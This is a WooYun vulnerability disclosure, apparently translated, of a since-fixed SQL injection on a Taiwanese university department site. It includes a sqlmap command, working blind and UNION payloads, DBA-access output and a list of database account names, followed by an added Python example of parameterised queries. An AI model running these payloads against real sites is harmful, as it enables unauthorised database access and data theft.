
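Vulnerability summary

Bug ID: wooyun-2015-0146585

Title: SQL injection vulnerability in the Department of Electronics Engineering, National Chiao Tung University, Taiwan (DBA privileges / administrative account password disclosure / large-scale disclosure of user activity records) (Taiwan region)

Vendor: National Chiao Tung University, Taiwan

Author: 路人甲

Submitted: 2015-10-14 10:20

Fixed: 2015-11-27 12:12

Disclosed: 2015-11-27 12:12

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed to a third-party partner organization (Hitcon Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]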



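Vulnerability details

Disclosure status:

2015-10-14: Details reported to the vendor; awaiting vendor handling
2015-10-15: Vendor confirmed; details disclosed to the vendor only
2015-10-25: Details disclosed to core white hats and experts in related fields
2015-11-04: Details disclosed to regular white hats
2015-11-14: Details disclosed to intern white hats
2015-11-27: Vendor has fixed the vulnerability and disclosed it voluntarily; details disclosed to the public

Brief description:

SQL injection vulnerability in the Department of Electronics Engineering, National Chiao Tung University, Taiwan (DBA privileges / administrative account password disclosure / large-scale disclosure of user activity records)

Detailed description:

Department of Engineering, National Chiao Tung University: http://**.**.**.**/
Tested with sqlmap against the URL: http://**.**.**.**/People/Professor/individual.php?TeacherID=T9434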

python sqlmap.py -u "http://**.**.**.**/People/Professor/individual.php?TeacherID=T9434" -p TeacherID --random-agent --technique=BU --current-user --is-dba --users --passwords


Proof of vulnerability:

1. DBA privileges

---
Parameter: TeacherID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: TeacherID=T9434' AND 4098=4098 AND 'EvrF'='EvrF
Type: UNION query
Title: Generic UNION query (NULL) - 37 columns
Payload: TeacherID=-8154' UNION ALL SELECT NULL,CONCAT(0x716a786b71,0x52635944654f696f5666,0x716a626271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
current user: 'root@localhost'
current user is DBA: True


2. Administrative account password disclosure

back-end DBMS: MySQL 5
database management system users [41]:
[*] '240mail'@'**.**.**.**'
[*] 'a10485a'@'localhost'
[*] 'acppiod'@'localhost'
[*] 'backup'@'localhost'
[*] 'backupuser'@'**.**.**.**'
[*] 'badge_vote'@'localhost'
[*] 'book'@'localhost'
[*] 'cactiuser'@'localhost'
[*] 'disscuss'@'localhost'
[*] 'eej'@'localhost'
[*] 'EEunion'@'localhost'
[*] 'eeweb'@'localhost'
[*] 'forum'@'localhost'
[*] 'hsy'@'localhost'
[*] 'MAdmin'@'localhost'
[*] 'mapply'@'localhost'
[*] 'mark'@'localhost'
[*] 'michael'@'**.**.**.**'
[*] 'michael'@'localhost'
[*] 'milk'@'localhost'
[*] 'mysqlcopy'@'%'
[*] 'mysqlcopy'@'%.**.**.**.**'
[*] 'news'@'**.**.**.**'
[*] 'news'@'localhost'
[*] 'news_reader'@'localhost'
[*] 'newweb'@'localhost'
[*] 'paper'@'**.**.**.**'
[*] 'paper'@'localhost'
[*] 'pplsel'@'localhost'
[*] 'pureftpd'@'localhost'
[*] 'pureftpd'@'student.**.**.**.**'
[*] 'questionnaire'@'localhost'
[*] 'repl'@'%.**.**.**.**'
[*] 'root'@'localhost'
[*] 'tvbull'@'**.**.**.**'
[*] 'unya'@'localhost'
[*] 'wordpress'@'localhost'
[*] 'wp'@'localhost'
[*] 'wp_stunion'@'localhost'
[*] 'wpalumni'@'localhost'
[*] 'wwwadm'@'localhost'
database management system users password hashes:


3. User activity record disclosure

Database: Log
Table: 2013
[5855 entries]



Remediation:

Add filtering.

Copyright notice: when reposting, please credit the source 路人甲@乌云
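An added example, not part of the original report and not the site's code: it shows what "filtering" should mean for the TeacherID parameter, placing a string-concatenated lookup beside one that validates the ID and binds it as a parameter. The table and column names, the sample rows, the ID pattern and the in-memory SQLite database standing in for the MySQL back end are all assumptions; the payload is the boolean-based one printed in the sqlmap output above.

```python
import re
import sqlite3

# Assumed ID format, inferred from the one value on the page ("T9434").
TEACHER_ID_RE = re.compile(r"T\d{1,6}")
# Boolean-based blind payload exactly as printed in the sqlmap output.
PAYLOAD = "T9434' AND 4098=4098 AND 'EvrF'='EvrF"


def make_db():
    """Constructed stand-in data; table and column names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE professor (teacher_id TEXT PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO professor VALUES (?, ?)",
                   [("T9434", "Constructed Name A"), ("T0001", "Constructed Name B")])
    return db


def lookup_vulnerable(db, teacher_id):
    # The parameter is pasted into the SQL text, so the quote characters in it
    # end the string literal and the rest is parsed as SQL.
    sql = "SELECT name FROM professor WHERE teacher_id = '" + teacher_id + "'"
    return db.execute(sql).fetchall()


def lookup_hardened(db, teacher_id, validate=True):
    # 1) Allow-list check: reject anything that is not a well-formed ID.
    if validate and not TEACHER_ID_RE.fullmatch(teacher_id):
        raise ValueError("malformed TeacherID")
    # 2) Bound parameter: the value is sent apart from the statement and is
    #    only ever compared as data, never parsed as SQL.
    sql = "SELECT name FROM professor WHERE teacher_id = ?"
    return db.execute(sql, (teacher_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload :", lookup_vulnerable(db, PAYLOAD))
    print("bound only, payload :", lookup_hardened(db, PAYLOAD, validate=False))
    try:
        lookup_hardened(db, PAYLOAD)
    except ValueError as exc:
        print("validated, payload  :", exc)
    print("validated, valid ID :", lookup_hardened(db, "T9434"))
```

Parameter binding closes the injection itself; the `root@localhost` DBA session shown in the proof is a separate exposure, and the application should connect with an account limited to the tables this page reads.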


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 18

Confirmed: 2015-10-15 05:54

Vendor reply:

Thank you for the report.

Latest status:

2015-11-27: Fixed